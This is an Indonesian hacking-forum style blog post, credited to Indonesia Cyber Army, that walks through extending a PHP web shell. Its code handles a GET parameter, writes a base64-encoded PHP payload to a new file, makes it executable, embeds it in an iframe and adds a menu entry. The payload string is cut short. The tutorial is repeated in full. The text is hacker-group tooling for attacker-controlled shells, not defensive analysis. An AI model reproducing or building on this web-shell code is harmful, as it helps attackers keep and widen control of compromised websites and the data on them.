Cara menambah fitur baru dishell folder baru

Cara menambah fitur baru dishell folder baru : (contoh menambah mysql)

1. Masukan code berikut :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
=============
elseif(isset($_GET['x']) && ($_GET['x'] == 'DIISI JUDULNYA')){
mkdir('FOLDER',PERMISSION);
chdir('FOLDER');

2. Maukan script MySQL Interfacenya (Kalo di shell ane udah ane encrypt cos lebih mudah :D

$mysql="PD8NCiRQ.......";

==========
$mysql <- namanya tererah yang penting di pemanggilannya nanti sama

3. Untuk membuat/mengambil file masukan code berikut :

file_put_contents('mysql.php',base64_decode($mysql));
==========
^mysql.php (file yang akan dibuat pada folder baru)
^$mysql <~ ini adalah nama pemanggil pada step ke-2 (ane asal aja gatau namanya XD)
^base64_decode : karena saya make encode base64 maka saya tulis itu kalo yang lainnya nanti tambahin aja sendiri :D

4. Terus kita chmod permission file mysql.phpnya
chmod('mysql.php',0755);

(ane juga gatau sih masalah chmod, mugkin biar bisa jalan :v)

5. Nah sebenernya ini udah jadi, tapi biar ngak perlu akses ( site.com/mysql/mysql.php) kita paang iframe

echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

==============
Nanti bentuknya jadi seperti ini :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
$mysql="PD8NCiRQ.......";
file_put_contents('mysql.php',base64_decode($mysql));
chmod('mysql.php',0755);
echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

langkah terakhir tinggal pasang di menunya :

<li><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">Mysql</a></li>
=======
x=mysql" <~ mysql terserah diisi apa yang oenting sama dengan => ($_GET['x'] == 'mysql')){

beres deh :'(
Maaf cuma ini yang bisa di share, kalo ada yang lainnya menyusul deh cos ane juga baru belajar Php sama om Gandrunx XD

Yang udah tau lewatin aja :D

Cara menambah fitur baru dishell folder baru : (contoh menambah mysql)
 
1. Masukan code berikut :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
=============
elseif(isset($_GET['x']) && ($_GET['x'] == 'DIISI JUDULNYA')){
mkdir('FOLDER',PERMISSION);
chdir('FOLDER');

2. Maukan script MySQL Interfacenya (Kalo di shell ane udah ane encrypt cos lebih mudah :D

$mysql="PD8NCiRQ.......";

==========
$mysql <- namanya tererah yang penting di pemanggilannya nanti sama

3. Untuk membuat/mengambil file masukan code berikut :

file_put_contents('mysql.php', base64_decode($mysql));
==========
^mysql.php (file yang akan dibuat pada folder baru)
^$mysql <~ ini adalah nama pemanggil pada step ke-2 (ane asal aja gatau namanya XD)
^base64_decode : karena saya make encode base64 maka saya tulis itu kalo yang lainnya nanti tambahin aja sendiri :D

4. Terus kita chmod permission file mysql.phpnya
chmod('mysql.php',0755);

(ane juga gatau sih masalah chmod, mugkin biar bisa jalan :v)

5. Nah sebenernya ini udah jadi, tapi biar ngak perlu akses ( site.com/mysql/mysql.php) kita paang iframe

echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

==============
Nanti bentuknya jadi seperti ini :
<?php }
elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
mkdir('mysql',0755);
chdir('mysql');
$mysql="PD8NCiRQ.......";
file_put_contents('mysql.php', base64_decode($mysql));
chmod('mysql.php',0755);
echo '<iframe src=mysql/mysql.php width=100% height=700px frameborder=0></iframe> ';
}

langkah terakhir tinggal pasang di menunya :

<li><a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">Mysql</a></li>
=======
x=mysql" <~ mysql terserah diisi apa yang oenting sama dengan => ($_GET['x'] == 'mysql')){

beres deh :'(


sumber:Indonesia Cyber Army (IDCA)

0 komentar:

Poskan Komentar